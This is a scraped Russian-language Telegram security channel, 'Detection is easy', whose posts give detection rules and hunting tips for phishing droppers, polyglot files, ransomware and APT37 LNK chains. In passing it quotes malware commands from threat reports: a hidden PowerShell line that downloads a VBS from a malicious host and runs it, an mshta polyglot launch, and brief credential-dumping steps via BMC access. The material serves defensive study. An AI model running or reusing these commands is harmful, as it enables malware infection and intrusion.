Detection is easy
Вчера вышел отчет от любимых многими thedfirreport - Confluence Exploit Leads to LockBit Ransomware ✌️ Если такая атака и будет, то она должна завершиться 🚫 на выполнении команд: whoami query user net user mshta ...\.hta curl ... Это несколько команд, которые…
Продожим тему с массовым запуском скриптов или исполняемых файлов. В данном отчете использовался PDQDeploy, но на его месте мог быть планировщик задач, SCCM, KSC, EDR, Gitlab-runner etc
Для обнаружения подозрительных действий агентами централизованного управления, за основу можно взять Sigma-правило, которое обнаруживает запуск дочерних процессов, от агента PDQDeploy.
Для спокойствия нам нужно отслеживать:
🔤 создание новых задач у агентов
🔤 изменение старых задач
🔤 массовый запуск одинаковых скриптов или процессов на разных хостах
#detection@detectioneasy
Для обнаружения подозрительных действий агентами централизованного управления, за основу можно взять Sigma-правило, которое обнаруживает запуск дочерних процессов, от агента PDQDeploy.
Для спокойствия нам нужно отслеживать:
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
sigma/rules/windows/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml at f3de589d08dd0f0b8041a02306f53323b99057aa…
Main Sigma Rule Repository. Contribute to SigmaHQ/sigma development by creating an account on GitHub.
👍5🔥4🤔2🍌1
Всем привет!
PT ESC выпустили отчет о действиях Dark Caracal.
❗️ Обратите внимание на использование контейнера для фишинга - REV-файл
Для обнаружения таких файлов можете использовать правила ниже:
Перед использованием правила ниже, убедитесь, что ваш конфиг Sysmon (если используется) регистрирует события с этим расширением)
#detection@detectioneasy
PT ESC выпустили отчет о действиях Dark Caracal.
❗️ Обратите внимание на использование контейнера для фишинга - REV-файл
Для обнаружения таких файлов можете использовать правила ниже:
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and CommandLine="\.rev($|\s)
Перед использованием правила ниже, убедитесь, что ваш конфиг Sysmon (если используется) регистрирует события с этим расширением)
ProviderName="Microsoft-Windows-Sysmon" and EventId=11 and TargetFilename = ".?:\\Users\\.*\.rev$"
#detection@detectioneasy
ptsecurity.com
Блог PT ESC Threat Intelligence
В этом блоге вы можете найти информацию об актуальных атаках хакерских группировок по всему миру, разбор их инструментов, информацию об инцидентах, TTP группировок, индикаторы компрометации и названия детектов в наших продуктах
🔥4👍3
Всем привет! 👋
Отличный пример, почему нужно обновлять прошивку и менять стандартные пароли от систем управления серверами (iBMC, Ilo, iDrac etc)
При получении доступа к системе управления сервером, вы увидете экран VNC, скорее всего нужно будет ввести пароль от системы, но может и повезет)
BMC позволяет загрузиться с live-cd, а дальше порядок действий всем знаком:
Для обнаружения таких атак:
🔤 нужно настроить сбор логов с BMC
🔤 настроить правила корреляции (с каких адресов могут авторизовываться), какие учетные записи
🔤 настроить корреляцию для монтирования дисков
🔤 проводить аудит учетных записей и уязвимостей
Еще один пример от Rapid7
#detection@detectioneasy
#ttp@detectioneasy
Отличный пример, почему нужно обновлять прошивку и менять стандартные пароли от систем управления серверами (iBMC, Ilo, iDrac etc)
При получении доступа к системе управления сервером, вы увидете экран VNC, скорее всего нужно будет ввести пароль от системы, но может и повезет)
BMC позволяет загрузиться с live-cd, а дальше порядок действий всем знаком:
создаем локального пользователя, сбрасываем пароль, переименовываем cmd, дампим креды и т.п (WinPE 😁).
Для обнаружения таких атак:
Еще один пример от Rapid7
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥3❤2😁1
Слышали ли вы про полиглот?) 😛
Нет, я не про людей которые занют много языков, а про файлы, которые могут интерпретироваться в зависимости от того какой утилитой их открывают)
proofpoint в своем отчете рассказали, как полиглоты применяются при фишинге📩
🔤 пользователю 🤤 приходит письмо со ссылкой, после перехода по которой он обязательно скачает zip-архив и откроет его
🔤 во вложении он увидит 2 полиглота - pdf/hta и pdf/zip в дополнение lnk с двойным расширением, который запустит всю цепочку xls.lnk
🔤 LNK-запускает pdf/hta командой
pdf/hta - pdf в конец которого добавили hta-файл, структура на скриншоте
🔤 hta проверяет наличие одного из архиваторов
🔤 hta добавляет в ключ
🔭 Для обнаружения такого поведения, мы можем отслеживать использование архиваторов с нетипичными для них расширениями файлов, и запуск архиваторов скриптовыми языками
В threat hunting, можем проверить:
🔤 наличие url-файлов в ключах реестра
🔤 наличие exe-файлов в директории
🔤 сделать ретро по запуску архиваторов
Ссылка на семпл
#detection@detectioneasy
#ttp@detectioneasy
Нет, я не про людей которые занют много языков, а про файлы, которые могут интерпретироваться в зависимости от того какой утилитой их открывают)
proofpoint в своем отчете рассказали, как полиглоты применяются при фишинге
Файлы Polyglot - это файлы, которые могут быть интерпретированы как несколько различных форматов, в зависимости от способа их чтения.
"C:\Windows\system32\cmd.exe" /c mshta.exe "%cd%\electronica-2024.pdf" &&' C:\Windows\System32\cmd.exe '
pdf/hta - pdf в конец которого добавили hta-файл, структура на скриншоте
7z, winrar, tar и распаковывает pdf/zip в директорию с задачами
"C:\Program Files\7-Zip\7z.exe" x "C:\Windows\Tasks\14s.pdf" -o"C:\Windows\Tasks" -y
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run путь к URL-файлу , который запустит exe из архива для запуска backdoorВ threat hunting, можем проверить:
C:\Windows\TasksСсылка на семпл
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥4🤔3
Всем привет! 👋
Сегодня пост касается не взлома компаний и организаций, а заражения простых пользователей майнерами и стиллерами🤔
ЛК выпустили ресерч про распространение малвари под видом утилит для обхода блокировок!
⚠️ Стоит обратить внимание на родственников, друзей, может кто-то из братьев или сестер решил посмотреть ютубчик и скачал прогу от более менее известного блогера, а там майнер/стилак 🤮
Что можно делать?)
🔤 напомнить о том, что не нужно скачивать все, что рекламируют)
🔤 проверить наличие директории может быть со схожим именем
🔤 проверить наличие службы с именем
🔤 выполнить полную проверку антивирусом ✌️
🔤 Проверить историю браузера на ресурс
#detection@detectioneasy
Сегодня пост касается не взлома компаний и организаций, а заражения простых пользователей майнерами и стиллерами
ЛК выпустили ресерч про распространение малвари под видом утилит для обхода блокировок!
Что можно делать?)
%LocalAppData%\driverpatch9t1ohxw8\di.exeDrvSvc и описанием Launches applications associated with still image acquisition events."gitrok[.]com#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Securelist
SilentCryptoMiner распространяется под видом средства для обхода блокировок
Злоумышленники используют жалобы и угрозу блокировки аккаунта, чтобы заставить YouTube-блогеров под видом средства для обхода блокировок распространять майнер.
👍3🔥2🤔2🥰1
Всем привет! 👋
Настроили мониторинг на веб-камерах, пока вас не пошифровали?🥷
Одна группировка пыталась распространить Akira-ransomware. Они успешно пробились в сеть, закрепились, получили права, которые им позволяют ходить по RDP.
При развертывании Akira на первом Windows-хосте сработал EDR (так бывает)😄
Хакеры не расстроились, просканили сетку, нашли уязвимую видеокамеру. Получили доступ к ее шелу.
С видеокамеры был доступ до серверов, которые нужно шифровать, и как отметили в отчете на ней не было EDR😀
Вооружившись Akira под Linux, через SMB зашифровали, что хотели))
Это нам говорит о чем?)❓
Что можно поставить 100 агентов и написать 5000 правил, но пока не будет базовой сегментации кого-то будут шифровать...
Вот это интересная атака)
#ttp@detectinoeasy
Настроили мониторинг на веб-камерах, пока вас не пошифровали?
Одна группировка пыталась распространить Akira-ransomware. Они успешно пробились в сеть, закрепились, получили права, которые им позволяют ходить по RDP.
При развертывании Akira на первом Windows-хосте сработал EDR (так бывает)
Хакеры не расстроились, просканили сетку, нашли уязвимую видеокамеру. Получили доступ к ее шелу.
С видеокамеры был доступ до серверов, которые нужно шифровать, и как отметили в отчете на ней не было EDR
Вооружившись Akira под Linux, через SMB зашифровали, что хотели))
Это нам говорит о чем?)
Что можно поставить 100 агентов и написать 5000 правил, но пока не будет базовой сегментации кого-то будут шифровать...
Вот это интересная атака)
#ttp@detectinoeasy
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥3🤔3🎉3
Сегодня мы запускаем особый код:
for woman in world:
woman.happiness += 100
woman.love *= infinity
woman.health = max()
Пусть ваш день будет защищен от багов,
А жизнь обновляется, как идеальный код.
Пусть любовь будет, как бесконечный цикл,
А счастье — как успешный деплой!
С праздником, прекрасные дамы!
Ваш код всегда в нашем сердце.
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3🤔3
Detection is easy
Всем привет!) 👋 Продолжим тему с фишингом 💌 , компания Innostage поделилась техникой с помощью которой их хотели взломать - rogue rdp 🔤 Пользователю на почту приходит письмо с файлом *.rdp 🔤 Пользователь открывает файл и подключается к удаленному серверу…
Всем привет!) 👋
Вспомним про rogue rdp)
Давайте попробуем похантить? Может нас где-то пробили?💻
🔤 В реестре есть ключ -
который хранить адреса серверов к которым мы подключались
🔤 Второй ключ хранит, адрес, домен\логин с которым подключались
Собрав информацию из этих ключей, мы можем найти выбросы - хосты, с которых не должны подключаться по RDP в локальной сети, или подключения на адреса за пределами корпоративной сетки
Больше информации про артефакты RDP можно почитать здесь
#detection@detectioneasy
Вспомним про rogue rdp)
Давайте попробуем похантить? Может нас где-то пробили?
HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Defaultкоторый хранить адреса серверов к которым мы подключались
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Terminal Server Client\ServersСобрав информацию из этих ключей, мы можем найти выбросы - хосты, с которых не должны подключаться по RDP в локальной сети, или подключения на адреса за пределами корпоративной сетки
Больше информации про артефакты RDP можно почитать здесь
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
devolutions.net
Using RDP without leaving traces: the MSTSC public mode
Learn how MSTSC’s /public mode works! It blocks credential caching, session details, and bitmap storage, enhancing security. Discover its impact and how to reset MSTSC for a clean slate.
🔥4👍3🤔2
Вернемся к теме с шифровальщиками 😱
Часто ransomware меняет раширения зашифрованным файлам или добавляет второе. Если ваши средства не остановили процесс шифрования, то можем попытаться обнаружить создание файла с подозрительным раширением💻
Список расширений и названий записок можно посмотреть здесь:
🔤 https://github.com/dannyroemhild/ransomware-fileext-list
🔤 https://github.com/mthcht/awesome-lists/blob/main/Lists/ransomware_extensions_list.csv
🔤 https://gist.github.com/sfponce/7c49269ed5a81f2a55dad39dc7cef5ad
⚠️ Событие Sysmon EventId 11, регистрирует только создание нового файла.
Для примера можем посмотреть Sigma-правило, для его работы нужно включить ETW
Можно добавить в конфиг сисмона имена записок и дать название правилу -
#detection@detectioneasy
Часто ransomware меняет раширения зашифрованным файлам или добавляет второе. Если ваши средства не остановили процесс шифрования, то можем попытаться обнаружить создание файла с подозрительным раширением
Список расширений и названий записок можно посмотреть здесь:
Для примера можем посмотреть Sigma-правило, для его работы нужно включить ETW
logman create trace "Microsoft-Windows-Kernel-File" -p Microsoft-Windows-Kernel-File -o "C:\Logs\Microsoft-Windows-Kernel-File.etl"
Можно добавить в конфиг сисмона имена записок и дать название правилу -
Ransomware, тогда в событиях создания файла сразу будет отображено, на что стоит обратить внимание.#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - dannyroemhild/ransomware-fileext-list: List with File Extensions used by Ransomware
List with File Extensions used by Ransomware. Contribute to dannyroemhild/ransomware-fileext-list development by creating an account on GitHub.
1🔥5❤2👍2
В ряде дроперов пополнение, хакеры используют 🩸
В этом примере злоумышленники прислали PDF-файл, который содержит ссылку. Перейдя по ней пользователь скачает REG-файл.
При открытии reg-файла событие запуска процесса будет содержать
Данный файл создает ключ реестра
Такое поведение мы можем обнаружить:
🔤 создание процесса
🔤 Создание reg-файлов в директориях пользователя
🔤 Добавим детект на основе ADS NTFS
Сэмпл в any.run
#detection@detectioneasy
#ttp@detectioneasy
*.reg-файлы
reg-файлы позволяют изменить значения ключей реестра.
В этом примере злоумышленники прислали PDF-файл, который содержит ссылку. Перейдя по ней пользователь скачает REG-файл.
При открытии reg-файла событие запуска процесса будет содержать
"regedit.exe" "C:\Users\admin\Downloads\pdf_graphics.reg"
Данный файл создает ключ реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SystemUpdate со значениемcmd.exe /c powershell -WindowStyle Hidden -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri 'https://support.zyfex.free.hr/down/maze.vbs' -OutFile '%TEMP%\maze.vbs'; Start-Process '%TEMP%\maze.vbs
Такое поведение мы можем обнаружить:
ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image endswith "regedit.exe" and CommandLine="\.reg($|\s)
ProviderName="Microsoft-Windows-Sysmon" and EventId = 11 and TargetFilename = "?:\Users\.*\.reg"
ProviderName="Microsoft-Windows-Sysmon" and EventId = 15 and TargetFilename endswith ".reg:Zone.Identifier" and Contents=".*ZoneId=3.*"
Сэмпл в any.run
#detection@detectioneasy
#ttp@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
app.any.run
Analysis package_photo.pdf (MD5: 3D89F1BCC3873D106F138F35A9B1D3C6) Malicious activity - Interactive analysis ANY.RUN
Interactive malware hunting service. Live testing of most type of threats in any environments. No installation and no waiting necessary.
1🔥4👍3😁2
Forwarded from ISCRA | InfoSec Club «Ra»
📍Расписание докладов ISCRA Talks 2025
14 марта состоится самое долгожданное мероприятие, на котором вас ждем настоящее погружение в мир информационной безопасности!
ISCRA Talks 2025 — конференция, объединяющая всех любителей инфобеза!
📌 Скорей регистрируйся и выбирай темы докладов, которые обязательно посетишь!
https://iscra-talks.ru/#/register
14 марта состоится самое долгожданное мероприятие, на котором вас ждем настоящее погружение в мир информационной безопасности!
ISCRA Talks 2025 — конференция, объединяющая всех любителей инфобеза!
📌 Скорей регистрируйся и выбирай темы докладов, которые обязательно посетишь!
https://iscra-talks.ru/#/register
1👍6🔥3🎄2🤔1
Detection is easy
Посмотрим чем ещё страшны LNK
What is LNK.pdf
24.2 MB
Презентация с ISCRA Talks
#detection@detectioneasy
#detection@detectioneasy
🔥6❤3👍2
Всем привет! ✌️
Вы следите за изменениями в событиях Windows?
О чем я говорю?) При установке обновления от 14 января 2025, Event ID 4768 и 4769 получат новые поля, с которыми мы познакомимся позднее
#detection@detectioneasy
Вы следите за изменениями в событиях Windows?
О чем я говорю?) При установке обновления от 14 января 2025, Event ID 4768 и 4769 получат новые поля, с которыми мы познакомимся позднее
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5🔥5🤔2🤩1
Detection is easy
What is LNK.pdf
В продолжение темы с LNK. Исследование TTP APT37 (ScarCruft, Reaper, Red Eyes)
🔤 Атака начинается с фишинга, содержащего ZIP-вложение, которое скрывает LNK
🔤 При выполнении файл LNK запускает multi-stage атаку с bat и PowerShell
🔤 Аргументы LNK проверяют рабочую директорию, затем рекурсивно ищут файл с определенным размером и расширением LNK в директории Temp
🔤 После обнаружения из LNK извлекается 1 hwpx (файл-приманка) и 3 dat-файла
🔤 Далее цепочка из скриптов загружает в память shellcode, для запуска RokRat. Для взаимодействия с C2 использовались API Dropbox, Yandex Disk и PCloud
Для поиска selfextracted-lnk можем похантить в аргументах cmd и powershell, вхождение Temp и LNK
#ttp@detectioneasy
#detection@detectioneasy
Для поиска selfextracted-lnk можем похантить в аргументах cmd и powershell, вхождение Temp и LNK
#ttp@detectioneasy
#detection@detectioneasy
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3🤔2❤1